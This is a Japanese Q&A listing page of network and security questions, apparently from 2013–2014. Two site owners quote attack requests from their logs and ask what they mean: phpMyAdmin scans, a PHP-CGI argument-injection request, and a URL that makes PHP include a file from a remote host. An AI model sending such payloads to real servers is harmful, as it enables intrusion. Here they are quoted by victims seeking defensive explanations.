セキュリティホール・脆弱性(16ページ目)

セキュリティ対策を行う上で、ソフトウェアの脆弱性についてはよく理解しておきたいもの。例えばローカル権限昇格、リモートによるコードの実行などがあります。こちらの投稿でもさまざまな事例が挙げられていますので、システム強化の参考にしてください。

回答数

気になる

ipを知れば接続記録を見ることが出来ますか？

たとえば公なでのパソコンのIPを知ることが出来ればそのパソコンのネット使用記録を見ることが出来ますか？公のパソコンは中央サーバとつながっていると思います。（メールや接続が出来なくなっているサイトがあります） ID,パスワード、接続記録など全部見ることが出来ますか？課長が数日前にいきなり自分の席にあるパソコンのIPなどを確認していったのでちょっと不安になって質問です。

質問日時: 2014/01/17 15:05 質問者: gagala

ベストアンサー

1

0
そう、ゾンビ・・・　

教えてくれた方、気づかなくてごめんなさい携帯が・・・誰かに操作されて（一応証拠は撮ってあります）いました。はっきりいって一年以上前には、既に。使用できるサイトに入れなかったりパスワードが変わっていたりヤフーアドレスは作ってすぐに盗まれたり（試しに送信するとerrorではなく、使われていました。）これらの証拠画像のプリントアウトやディスクで犯人特定は可能でしょうか？気持ち悪いです。長文申し訳ありませんがアドバイスいただけましたら幸いです。キャリアauなのにいつのまにかSoftBankでのシークレットモードアドレスが潜り込んでいた事もあり（シークレットを使用しないので気づけませんでした）また一体何が目的でしょうか？嫌がらせにしては人と関わり無いから不思議です。重要人物でもありません(゜∇゜)

質問日時: 2014/01/03 17:17 質問者: beest002

ベストアンサー

5

0
Janeとかで２ｃｈ見てますが、セキュリティ大丈夫

Ｊａｎｅという、２ｃｈ閲覧ソフトで会社から見ているのですが、２ｃｈってセキュリティ的に危なくないですか？会社のパソコンには、ＮｏｒｔｏｎＩｎｔｅｒｎｅｔＳｅｃｕｒｉｔｙが入っているのですが、２ｃｈを見てる人からＩＰ暴かれ、アタックされたりとかってことありうるのでしょうか？会社で見たらよくないでしょうか？まあ、何を会社で見ていいか、悪いかとかとても難しい話ですが。そのあたり詳しい方、ご指導お願いいたします。よろしくお願いいたします。

質問日時: 2014/01/03 15:24 質問者: Kuronari12

ベストアンサー

22

0
PCのセーフモード

PCがセーフモードになってしまいました。電源を点けても画面が暗いままです。マウスを動かすとマウスポインターが現れます。どこのキーを押せば良いのか解りません。 PCはＴＯＳＨＩＢＡのＤｙｎａｂｏｏｋのT552/58GBのWindows8.1を使用しています。宜しく御願いします。

質問日時: 2014/01/03 12:36 質問者: qv0bk

解決済

6

0
LAN接続でも、ローカルエリア接続は複数必要？

■環境・フレッツ光・光電話なし・有線ルータ利用(PC2台) ・Windows7 ・WindowsXP ■質問1 ・各PCにローカルエリア接続はそれぞれ必要なのでしょうか？選択肢A.必ず必要(PC2台あったらそれぞれのPCにローカルエリア接続を要設定) 選択肢B.メインのPCにだけあれば良い(他のPCはLANポートにケーブルを挿すだけ) ■質問2(選択肢2の場合) ・各PCにローカルエリア接続が存在しても良い？選択肢A.全部のPCに存在しても良い(不要なローカルエリア接続は使わないだけだから) 選択肢B.メインPCにだけ設定(他のPCにローカルエリア接続があると干渉する場合があるので削除した方が良い) ■質問3 ・「ローカルエリア接続」の役割は？・実際のネット接続設定は「ルータ管理画面」を通して、ルータ内部(?)へ設定すると思うのですが、「ローカルエリア接続」は何をしているのでしょうか？　何のために必要なのでしょうか？

質問日時: 2013/12/23 09:00 質問者: re97

ベストアンサー

6

0
ストレッチング

こんにちは。今日、パスワードに関する記事を読みました。パスワードというのは平文で保存しないで、代わりにハッシュ関数を施した値を保存して、これらの値が漏えいしても元のパスワードが解読されないようにしているみたいです。そして「ストレッチング」というのは、このハッシュ計算を何回も施した値を保存するのだそうです。そこで、質問です: パスワードの保護に関して「十分に安全なハッシュ計算」（そういうモノがあるとして）の冪乗は、再び「十分に安全なハッシュ計算」になるのでしょうか。よろしくお願いします。

質問日時: 2013/12/21 03:47 質問者: jmh

ベストアンサー

3

0
DHCPサーバから、WAN側IPアドレスを自動取得

・ルータ管理画面で、よく分からない項目があるのですが、教えてください ■設定 WAN設定／WANポート／WAN側IPアドレス・項目1 … 「DHCPサーバからIPアドレスを自動取得」・項目2 … 「PPPoEクライアント機能を使用する」・以下略 ■現状・「PPPoEクライアント機能を使用する」を選択しているのですが、ここを「DHCPサーバからIPアドレスを自動取得」へ変更すると、ネットへ繋がらなくなります ■質問1 ・なぜ変更すると、ネットに繋がらなくなるのでしょうか？・WAN側IPアドレスの「DHCPサーバからIPアドレスを自動取得」って何ですか？・LAN設定のDHCPサーバ機能は「使用する」にチェックを入れています。これは「割り当てIPアドレス」から指定台数だけIPアドレスを自動で割り振る機能だと思うのですが、これのWAN側バージョンはどういう意味なのでしょうか？　WAN側IPアドレスは接続が切れるたびプロバイダから任意のIPアドレスを渡されるだけだと思うのですが… ■質問2 ・「WAN側IPアドレス」＝「グローバルIPアドレス」でしょうか？ ■環境・フレッツ光・光電話なし・ルータ利用(PC2台)

質問日時: 2013/12/20 09:48 質問者: re97

ベストアンサー

3

0
パケットフィルタリングで広告を除去

PCだけならAd Blockなどを設定したりhostsの書き換えだけで対応できるのかもしれませんが iPod touchなども脱獄せずに広告を除去したいのでとりあえずルーターのパケットフィルタの設定からIPアドレスを指定していくつかの広告は除去できました。ルーターにURLフィルタリングの機能があれば簡単に設定できるのですが、Atermなので IPアドレスでしか登録できません。 nslookupでドメイン名を入力してIPアドレスを調べたのでいくつかの広告は的外れのIPアドレスを指定してしまっていました。ブラウザでサイトを開いたときに読みこまれる広告のIPアドレスを調べたいんですがどのような方法がありますでしょうか？パケットキャプチャリングソフトなどで詳しく確認できたりするんでしょうか？よい調べ方があればご紹介お願いします。

質問日時: 2013/12/19 18:22 質問者: dealerofle

ベストアンサー

2

0
IPアドレスが変わったらファイルを書き換えたい

・ローカル環境のWindows7に、ルータ経由でフレッツ光回線接続しています・常時接続しているのですが、数時間に一回ぐらいの割合で、WAN側のグローバルIPアドレスが変わります ■ローカル側・この切り替わったタイミングで、Windows7にある指定ファイル(「.htaccess」「config.php」)にあるIPアドレス値を書き換えたいのですが、可能でしょうか？ ■サーバ側・もしくは、このタイミングで、借りているVPSサーバーへ自動アクセスして指定ファイル(「.htaccess」「config.php」)を書き換えることは可能でしょうか？・WAN側のグローバルIPアドレスの変更を、AJAXのように随時検知して、ファイルを書き換えるアクションがもし可能なら、その方法を教えてください・ルータとかにそういう機能はあるのでしょうか？・もしくは、コマンドで何かする？・あるいは、Windowsのサービス処理か何か？

質問日時: 2013/12/19 11:00 質問者: re97

ベストアンサー

1

0
WinXP搭載マシンでURLにアクセスする方法

マイクロソフトとの契約更新で必要なURLだが、OS：WinXP、IE(IE8)で下記のリンクにアクセスすることが出来ません。(Internet Explolerではこのページは表示できません) Win7だとアクセス可能です。ネットワークは正常に接続出来ています。 https://vsipprogram.com/Partner/Contact/859 https://vsipprogram.com/Partner/Renew/203 OSの移行は行わず、IEでアクセスする方法を教えて頂けますでしょうか。下記実施済みだが現象変わらず。 http://support.microsoft.com/kb/956196/ja ・SSL 2.0チェック外す・ブラウザーの履歴を削除・Internet Explorer のアドオンを無効にします。・Internet Explorer をリセットします。・サードパーティ製のサービスまたはプログラムが Internet Explorer と競合しているか確認・PC を以前のポイントへの復元

質問日時: 2013/12/13 08:22 質問者: n86

ベストアンサー

2

0
apacheのaccess.logについて

最近自宅にてdebianでwebサーバーを公開し始めました。サイトは昔の部活仲間や友達内だけの小さなサイトです。当初からapacheのaccess.logのログをみて、さまざまな国からアクセスがあったことを知って戦々恐々としています。自分のできる対策として.htaccessで日本のIPのみアクセスを許可したり、 sshのポートを変更し、公開鍵認証のみにし、rootログインも禁止したりしました。ポートは80番とsshのみ開けています。telnetは消しました。 cronでaptitude updateとupgradeを毎日自動でやるよう設定しました。これでだいぶ国外からのアクセスが減ったのですが、まだこのような良くわからないアクセスがaccess.logに残ります。これらについて教えてください。 ----------------------------- 74.7.65.34 - - [07/Dec/2013:23:29:47 +0900] "\x80w\x01\x03\x01" 403 278 "-" "-" 74.7.65.34 - - [07/Dec/2013:23:29:47 +0900] "GET /HNAP1/ HTTP/1.1" 403 503 "http://114.188.50.107/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)" ----------------------------- 1-163-194-59.dynamic.hinet.net - - [07/Dec/2013:23:32:59 +0900] "CONNECT mx0.mail2000.com.tw:25 HTTP/1.0" 403 490 "-" "-" 61-228-90-61.dynamic.hinet.net - - [08/Dec/2013:01:42:04 +0900] "CONNECT mx2.mail2000.com.tw:25 HTTP/1.0" 403 490 "-" "-" 61-228-23-159.dynamic.hinet.net - - [08/Dec/2013:04:15:29 +0900] "CONNECT mx0.mail2000.com.tw:25 HTTP/1.0" 403 490 "-" "-" ----------------------------- 20.254.52.119.adsl-pool.jlccptt.net.cn - - [07/Dec/2013:18:52:39 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 490 "-" "ZmEu" 20.254.52.119.adsl-pool.jlccptt.net.cn - - [07/Dec/2013:18:52:39 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 403 481 "-" "ZmEu" 20.254.52.119.adsl-pool.jlccptt.net.cn - - [07/Dec/2013:18:52:40 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 479 "-" "ZmEu" 20.254.52.119.adsl-pool.jlccptt.net.cn - - [07/Dec/2013:18:52:40 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 403 476 "-" "ZmEu" 20.254.52.119.adsl-pool.jlccptt.net.cn - - [07/Dec/2013:18:52:40 +0900] "GET /myadmin/scripts/setup.php HTTP/1.1" 403 479 "-" "ZmEu" 20.254.52.119.adsl-pool.jlccptt.net.cn - - [07/Dec/2013:18:52:41 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 403 479 "-" "ZmEu" ----------------------------- 189.25.210.226 - - [08/Nov/2013:21:47:01 +0900] "-" 408 0 "-" "-" 95.39.62.79 - - [09/Nov/2013:03:46:42 +0900] "\xb7\xda\x84" 501 294 "-" "-" 91.79.51.155 - - [11/Nov/2013:16:05:26 +0900] "\xf7\xa1\xb5K\xa4Q\xd5\x14\xd6\x886{A\xec\xd5\xd2\xbb\x93Z\x04l\xf8\x19" 501 314 "-" "-" 93.174.93.69 - - [29/Nov/2013:02:57:31 +0900] "GET /invoker/JMXInvokerServlet HTTP/1.0" 404 505 "-" "-" 221.122.80.105 - - [25/Nov/2013:09:41:08 +0900] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 495 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25" ----------------------------- 相手のIPまんまですが一つ目の「74.7.65.34」のアメリカからのアクセスの "\x80w\x01\x03\x01" 403 278 "-" "-" の「\x80w\x01\x03\x01」はいったいなんですか？二つ目の台湾からのアクセスについてわかることを教えてください。あと自分は初心者ではっきりとはわからないのですが、三つ目のアメリカからのアクセスは明らかに悪意のあるような気がしますが、わかることを教えてください。四つ目の5つは古いログであまり対策がとられていなかったころのものですが、「"-" 408 0 "-" "-"」「"\xb7\xda\x84"」なの意味がわからないのですが、これらは悪意のあるアクセスですか。わかることを教えてください。

質問日時: 2013/12/08 17:41 質問者: p0pip0

ベストアンサー

1

0
VPNの必要性

現在、外部のレンタルサーバーでMySQLサーバーを動かし、そのDBに、VPNを介してインターネットを通してやり取りする専用の業務アプリを作り、そのアプリで様々な業務上の作業を行っています。そこで、ふと思ったのですが、この外部のサーバーとのやり取りはMySQLとの通信だけです。VPNを利用する意味はあるのか？と思いました。ファイルサーバーやアプリケーションサーバーなどいろいろな用途に使われる場合は、通信のプロトコルやポートなど様々なので、すべてを包括的にトンネル化するVPNが有用だと思いますが、例えば、特定のプロトコルでしか通信しない場合、そのプロトコルで暗号化されていれば、問題ないのかな？と考えました。実際どうなんでしょうか。もちろん、接続を開始する段階の「認証」は別で考える必要がありますが。詳しい方、よろしくお願いします。

質問日時: 2013/11/26 01:31 質問者: mshs2

ベストアンサー

4

0
windows VistaとXP

ウィンドウズXPのウィルス感染の危険性が指摘されているようですが、自分がどのタイプのwindowsを使っているかわかりません。ＶｉｓｔａのシールがPC本体に付いているということは、このPCがXPではない、ということを指していますか？ PCのことに全く詳しくないので、初歩的質問ですが、どうぞよろしくお願いします。

質問日時: 2013/11/22 18:02 質問者: framboise7

ベストアンサー

5

0
サブネットマスクの決定方法

よろしくお願いします。 300台のPCが繋がるLANがあり、16ビット(255.255.0.0)でサブネット化されています。そのLANに今度600台のPCを追加する予定です。 IPアドレスの数は問題無いのですが、通常この程度のPC台数で16ビットマスクを使用するものか分かりません。 21ビットマスクでもIPの数は足りますし、もっと細かくしてビルのフロア毎に分ける事も可能と思います。どのようにサブネットを決定して行くものなのか分からないのでアドバイス下さい。また、現在のサブネットで発生しうる問題等ありましたら教えて下さい。 (問題無いのであればいじりたく無いと思っています) 補足・PCは主拠点に集中しています。主拠点はビルでPCは複数フロアにあります・広域イーサで接続されたいくつかの拠点に少数のPCがあります

質問日時: 2013/11/21 21:25 質問者: qm-mp

解決済

3

0
VNCがつながるwifiとつながらないwifi

こんばんはＶＮＣを利用してＰＣ画面上にアンドロイドの画面を表示しているのですが、つながるwifiとつながらないwifiがあります。下記のような構成です（棒線は有線、点線は無線をあらわしています）光回線モデム　｜ルーター（A t e r m B L 1 9 0 H W）-PC（デスクトップ) 　｜ AU HOME SPOT CUBE（無線アクセスポイントとして利用）　・・・・　Android端末 au home spot cubeには複数のSSIDがあり、WPA2でセキュリティ保護されたネットワーク（仮に1番とする）、WEPでセキュリティ保護されたネットワーク（仮に2番とする）があります。 android端末を1番のネットワークでwifiをつなげた時はVNCとつながるのですが、２番のネットワークでwifiをつなげた場合はconnection timed outになってしまいます。原因は何なんでしょうか？

質問日時: 2013/11/13 20:36 質問者: Hypnomatic

ベストアンサー

2

0
ネットワーク構築の勉強

　長年ソフト会社にてシステム開発をしてきており、現在社内ＳＥとして働いて数年経ちますが、ネットワークに関しては、全くわからない状態です。　そもそも開発していた時、ネットワークに関しては、メーカかユーザの作業範疇であったため、何らタッチする事がありませんでした。言われたＩＰアドレスを利用するというくらいなものです。　　メーカやユーザのネットワークまで構築されるプロジェクトに参加されてきた方なら、学べる下地は会社で用意されているでしょうが、ユーザサイドの方は、どのようにして学ばれているのでしょうか？。　　ルータを自費で購入する余裕はありません。ＰＣを複数買うのも余裕ありません。会社側で余計にルータを買う余裕もなく、情報システム部門がなく総務部門の中におりますので、承認も当然おりませんし、試験的に構築して学べる環境でもありません。　　　私が来るまでは、ベンダ任せにしてたそうで、何故そういう構築をしたかの経緯も仕様書もありません。ＩＰアドレスの振り分けも、社員に入れ替りが激しいので、前職者のＰＣをそのまま利用したり、増員の場合は、空きＩＰを設定する程度の作業です。　そもそもなんで、１９２．１．１０．ＸＸでルータ設定しており、拠点も第三オクテットを１１，１２・・・としているのかもわかりません。ルータでそう設定しているからなんだろうなあ程度です。また、ＮＴＴのＶＰＮサービスを利用してるようですが、当時の担当者はおらず、下請けだった業者ももういないとかで聞く事ができません。別のベンダに見てもらう事は出来ますが、中小ですので、どうせなら私の方でやりたいのですが（ＣＩＳＣＯのルータを使ってますが、ログインＩＤがわからないため、こちらでは何もできない状況でもあります。ログインＩＤ情報等は、ＮＴＴが開示してくれないのでＣｏｎｆｉｇも取れません）。

質問日時: 2013/11/13 09:48 質問者: tachin

ベストアンサー

6

0
メールアドレスからの住所特定について

不思議なことが起こりました。ある企業のお問い合わせページに名前とメールアドレスを打ち込むとなんと住所まで、番地まで表示されるのです。　Chrome Autofill　Setting という表記が出てくるのですが、これはいったいどういうことなんでしょうか？おそらく過去に打ち込んだ記録を呼び出してきていると思うのですが、 CCｌeanerで記録は毎回のように消しているのですが（フォームへの入力履歴、保存されたパスワードは消してません。）　まさかメールアドレスから住所が割り出されているようで気持ち悪いです。ブックオフの一般のお客様　お問合で窓口です。調べて見て下さい。

質問日時: 2013/11/10 19:25 質問者: Alico_dego

ベストアンサー

3

0
ネット経由でリモートデスクトップ接続（ドメイン内）

自宅PCから社内のPCへリモートデスクトップ接続を行おうとしていますが、うまくいきません。（会社の許可はもらっております。）エラー内容は　「リモートデスクトップはリモートコンピューターに接続できません」社内にはA、Bの2台PCがあります。うまく接続できないのは、自宅PCからBに対してです。 [自宅側] 自宅PC（Windows7 32bit workgroup) [社内LAN　グローバルIPは固定]　 ※ルーターにて（ポート3389→192.168.0.101） A（Windows7 32bit workgroup IP:192.168.0.100) B(Windows7 64bit domain IP:192.168.0.101）以下の二通りについては、問題なくリモートデスクトップで接続できました。・自宅PC→A（この時はルーターの設定を192.168.0.100に変更) ・A→B 自宅PC→Aでつながっているので、ADユーザーの権限辺りが怪しいのかなと考えて、権限をいじってみましたが、結果ダメでした。現在Bのログインユーザーは、・Administrators ・Domain　Admins ・Domain　Users ・Remote Desktop　Users が所属グループになっています。どなたか、造詣が深い方いらっしゃったらご教授お願いします。

質問日時: 2013/11/06 11:52 質問者: zilch_123

ベストアンサー

3

0
スーパーセキュリティーゼロ　ツールバー削除方法

スーパーセキュリティー　ゼロをつかっております。インターネット検索時に画面上のほうに黒色の点々のついたツールバーがでています。中身は　「このサイトは安全です」とかかれており、開くサイトによっては、画面中央付近にツールバーが降りてくるため　非常に邪魔になっています。このバーの削除の方法はないのでしょうか？

質問日時: 2013/11/05 14:39 質問者: sinsyunka

ベストアンサー

1

0
ネットワークアドレスについて

ネットワークアドレス/ブロードキャストアドレスにの求め方についての質問です。 110.222.34.90/27 このIPアドレスからブロードキャストアドレス、ネットワークアドレスの求め方について解説付で答えていただきたいのですが？それと設定可能なIPアドレス数も解説付きでお願いします。ちなみに私がやってみた答えです。ネットワークアドレス　　110.222.34.90.192 ブロードキャストアドレス　　110.222.34.90.63

質問日時: 2013/11/02 18:49 質問者: atack3000

解決済

4

0
ファイルサーバーへのフォルダ、ファイルへのアクセス

ファイルサーバー（イントラネット）の特定ファイル、フォルダへのアクセスを確認する方法はありますか。特別ID、Pass等設けていない、社内の共有ファイルサーバーです。よろしくお願いします。

質問日時: 2013/11/01 07:35 質問者: trotrotron

解決済

2

0
ネットワークへのアクセスを制限したい

パソコンからネットワークへのアクセス制限を行いたいのですが、以下のような状況で可能なのでしょうか。可能であれば設定方法をお知らせいただけますでしょうか。 OSはWindows 7 Professional。WORKGROUP使用です。私どもの部署のパソコンを、セグメントの異なる他部署の人間に使用させます。使用させるアカウントは管理者権限を与えています。他部署の人間は私どものパソコンで、自分たちの部署のパソコンへリモートデスクトップ接続し、自分たちの部署のパソコンの中でファイル開き、閲覧します。従いまして、私どものパソコンのOffice等のアプリケーションを開くということはないですし、設定を大きく変えるということもありません。しかしながら、私どものセグメントには他部署に見せたくないNAS等があります。すべて固定IPです。一部、アクセス制限を設定していないNASもあり、それは私どものパソコンを使用する限りは（現状の設定では）見えてしまいます。また、プリンタも同様です。このように、他部署のセグメントへ接続させつつ、私どものネットワーク資産にアクセスさせない、という設定は可能なのでしょうか。新たに制限ユーザーを作成することも、グループポリシーなどを変更することも可能です。

質問日時: 2013/10/29 16:10 質問者: saruchan002

解決済

2

0
IPアドレスからPCにハッキング？

こちらのグローバルIPアドレスとローカルIPアドレスを相手は分かっていて、ウィルスが感染していない事が前提で PCがハッキングされる事はあるのでしょうか？ちなみにMacBookProにWindows7をインストールして使っています。リモートデスクトップはOFFにしています。 MacBook標準搭載のPCマイクの入力はONにしていました。インターネットはルーターから有線でつないでいます。この状態からPCにアクセスされMacBookのWebカメラの起動ランプを消したまま(こちらが分からない様に)での盗撮、 PCマイクにアクセスして盗聴されるのは可能でしょうか？

質問日時: 2013/10/27 21:06 質問者: slightwave

解決済

2

0
CRLのサイズ

S/MIMEの証明書を作るソフトについて調べています。 http://eternalwindows.jp/crypto/certverify/certverify05.html の記述で、以下のものがありました。さて、それではユーザーは、どのようにしてCRLを取得することになるのでしょうか。これは証明書の検証時などに、アプリケーション内で暗黙的にネットワーク上からダウンロードすることになっているため、ユーザーが手動でCRL配布ポイントにアクセスするようなことはありません。ただし、ダウンロードしたCRLはローカルコンピュータ上にキャッシュすることも可能であり、キャッシュされたCRLのみで証明書を検証する方法もよく用いられます。また、CRLは証明書と同じくシステムストアに格納することも可能です。となっていますが、CRLのデータサイズはどのくらいなのでしょうか？大きすぎて扱いに困るようなことはありませんか？よろしくお願いいたします。

質問日時: 2013/10/24 17:52 質問者: uyama33

ベストアンサー

2

0
プロキシ非対応のソフトをプロキシ経由で接続

プロキシ非対応で、HTTPでインターネット上のサーバと通信するソフトがあります。そのソフトを会社内から使いたいのですが、会社にはプロキシサーバが立っているため、プロキシサーバを経由してID/PASSを入力した上で、インターネットに出る必要があります。プロキシ非対応のソフトを変更する（作者に改良してもらう）以外に、何か良い方法はありませんか？アウトバウンドのTCP:80をフックして別のホストに向けるようなラッパーがあって、 proxyサーバに対応しているソフトでもあれば、なんとかなるような気がするのですが・・・

質問日時: 2013/10/22 16:29 質問者: onsen-suki

解決済

2

0
プロキシ使用時のアクセスログについて教えてください

LAN内にプロキシサーバ(プロキシA)を立てて、外に出るアクセスのログを取っています。このときローカルPCのブラウザでLAN外にあるプロキシサーバ(プロキシB)をプロキシに設定してサイトCへアクセスしたとき、プロキシAのログにはプロキシBへのアクセスログだけが残り、サイトCへアクセスしたというログは残らないという認識であっていますでしょうか。

質問日時: 2013/10/19 14:50 質問者: ygn001

ベストアンサー

2

0
これってサイバー攻撃でしょうか？

私が運営するWebサイト（www.example.comとします）に、以下のようなアクセスログが残っていました。 www.example.com/?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://61.19.253.26/echo.txt 最後のIPアドレス「61.19.253.26」を調べると、タイ国のもののようですが、使用されていないようです。これってサイバー攻撃の一種なのでしょうか？何かしらの情報が盗まれたりした痕跡なのでしょうか？自分で、ブラウザに上記URLを打ち込んだのですが、反応がありませんでした。ちなみに、私のサイトはレンタルの共有サーバーで運用しています。また、全てPHPで作成しており、ルートのindex.phpにパラメータを与えることで、全てのページを表示させるようにしています。なお、index.phpとcssや画像以外は非公開ディレクトリに置いています。また、同一契約で上記と同じ公開ディレクトリに複数のWebサイトを作っています。盗まれたものは取り返せないので仕方がないのですが、危険な攻撃であればセキュリティを高める手段を講じる必要があると感じています。上記アクセスで何が行われたのか、どのような危険があるのか、ご存じの方がいらっしゃいましたらご教授いただければ幸いです。よろしくお願いいたします。

質問日時: 2013/10/18 00:03 質問者: ka-kichi

ベストアンサー

1

0
UQWimaxの安全性

ネットに繋ぐだけでクラッキングを受ける昨今ですが、ネットに繋いだ瞬間グローバルIPアドレスではなく、プライベートIPアドレスを割り振られるUQ Wimaxであれば、ただ繋いでいる状態ではクラッキングの対象にはならないと思うのですが、ルータがWimax側にあるような状態でも、やはり繋いだだけの状態でクラッキングの対象にはなり得るでしょうか？よろしくお願いします。

質問日時: 2013/10/11 14:25 質問者: xdfsa11a

ベストアンサー

4

0
PAT(NAPT)の動作について

ネットワークの書籍を読むと内部PCから外部へアクセスする際、送信元IPとポート番号がルーターのNATテーブルに保持されその変換テーブルを元にして、PATにおけるIPとポートの変換が実現されるとあるのですがいくつか疑問がありましたので質問させてください (1)内部ネットワーク側から通信を開始したなら問題なく通信出来ると思いますが外部サーバーから始まる通信だとNATテーブルに情報がないためプライベートIPとポートに変換出来ないのではないでしょうか？その場合は、どういう技術や対象方法があるのでしょうか？ (2)例えば複数の内部PCからPATで外部へアクセスする場合内部PCのポート番号は65535までのポートをランダムに使用することになると思います。しかし、もし内部PCが使用するポートが重複してしまった場合はアクセス不能になってしまわないのですか？つまり、外部サーバーから見ると、10.0.1.1:65535、10:0.1.1:65534のようにポート番号だけ変えてアクセスしてくるわけですし、もしポート番号が重複してしまうと変換出来ないと思います。ポート番号はそれぞれのPCが独自に設定するものなので重複することもありえると思うのですがどのように処理されているのでしょうか？

質問日時: 2013/10/07 09:27 質問者: kyotokyo

ベストアンサー

2

0
少しは強力な暗号方式は何でしょうか？

アメリカの盗聴でブラジルの怒りが、、 http://vagpress-salvador.blogspot.jp/2013/09/blog-post_18.html ですが、、、、普通の（アメリカが決めた標準の）暗号方式は解読できるような話も出ています。いま存在する暗号方式で、それなりに強力な方式は何でしょうか？ブロック暗号では、ブロックサイズをどのくらい大きくすれば、解読時間を２倍に出来ますか？参考文献があれば、教えてください。（必要な予備知識についても簡単に教えてください。）読んでみたいと思います。よろしくお願いいたします。

質問日時: 2013/10/05 07:56 質問者: koinobori7

ベストアンサー

3

0
DNSサーバのゾーンファイルの書き方

自宅LAN内にDNSサーバーをたてたくて、ググりながらゾーンファイルを書いてるのですが、正しいのか自信がありません。おかしくないか見てもらえないでしょうか。 hoge.co.jp、dev1.hoge.co.jp、svn.hoge.co.jp などにアクセスしたとき、 192.168.1.100 にとばすようにしたいです。 ※最初間違ってハードウェア（サーバー）カテゴリであげてしまったので、そちらは削除してもう一度あげなおしています。 <named.confの記述> ---------------------- zone "hoge.co.jp" IN { type master; file "hoge.co.jp.zone"; }; zone "1.168.192.in-addr.arpa" IN { type master; file "hoge.co.jp.in-addr.arpa.zone"; }; <hoge.co.jp.zone の内容> -------------------- $TTL 86400 @ IN SOA dns yamamoto ( 2013290000 ; Serial 28800 ; Refresh 14400 ; Retry 3600000 ; Expire 86400 ) ; Minimum IN NS dns @ IN A 192.168.1.100 dns IN A 192.168.1.100 dev1 IN A 192.168.1.100 dev2 IN A 192.168.1.100 dev3 IN A 192.168.1.100 svn IN A 192.168.1.100 <hoge.co.jp.in-addr.arpa.zone の内容> ------------------------------------- $TTL 86400 @ IN SOA dns yamamoto ( 2013290000 ; Serial 28800 ; Refresh 14400 ; Retry 3600000 ; Expire 86400 ) ; Minimum IN NS dns 100 IN PTR hoge.co.jp.

質問日時: 2013/09/30 00:27 質問者: zigzagfire

ベストアンサー

2

0
パケット通信解析ソフトでURLを調べたい

http://oshiete.goo.ne.jp/qa/8278963.html ↑この質問をしたものなのですが、マクロでいろいろな作業を自動化するのに、パスワードとIDを別で入力してサブミットを押すのを減らしたいと考えています。そのためには、URLで直接IDとPASSが埋め込んであるURLを使いたいと考えています。そこで、パケット通信解析ソフトなのですが、そういった、パスワードをとIDの部分を見つける方法が簡単なフリーのパケット通信解析ソフトはあるでしょうか？

質問日時: 2013/09/29 01:02 質問者: satisfied999

ベストアンサー

3

0
ログインIDやPWがクリックで表示されるのは？

このサイトでもログイン時にマウスクリックするとIDとパスワードが自動表示されます。この機能はどこがサジェストしているのですか、 OS、サイト自身が過去のデータから、かな漢字変換のオートサジェスト機能。この変かと想像するのですがかな漢字変換のオートサジェストだとするとサイトが異なるのを全て記録しているのでしょうか？また銀行などセキュリティのきついところでも簡単にIDとパスワードが出てきます。これだと他人がクリックしてもサイトに入ることが出来る事になりますその辺のセキュリティはどうなるのでしょうか

質問日時: 2013/09/28 21:26 質問者: aragyukf

ベストアンサー

4

0
ファイル共有の仕方について

ファイルの共有について教えてください。ドメイン環境でデータ受け渡しのためにフォルダを共有しようと考えています。検索して調べたところ、ファイル共有には以下２つの方法があることを知りました。 (1)対象フォルダを右クリックして、共有(H)から共有するユーザーを選択する (2)対象フォルダを右クリックして、プロパティの"共有"から"詳細な共有(D)"を選び、共有するユーザーを選択するわざわざ方法が違うということは、それぞれ使い勝手が異なるのだろうと思いますがその事情は検索してもこれといった回答に巡り合えませんでした。（後者はフォルダに任意の共有名をつけることが出来るようですが、それが大きな違いなのでしょうか？）ご存知の方、それぞれの利点を教えて頂けると幸いです。私の環境はWindows Vista Professionalです。よろしくお願いいたします。

質問日時: 2013/09/25 21:26 質問者: ninnikutips

ベストアンサー

1

0
Windows CryptoAPIは大丈夫かな？

S/MIME機能の拡張を考えて　CryptAPI　の資料を読んでいる所です。最近、 http://itpro.nikkeibp.co.jp/article/NEWS/20130920/506064/ こんな話題がありますが、 Windows の　CryptoAPI　は大丈夫でしょうか？

質問日時: 2013/09/24 15:19 質問者: uyama33

ベストアンサー

1

0
RT107eというルータの設定について

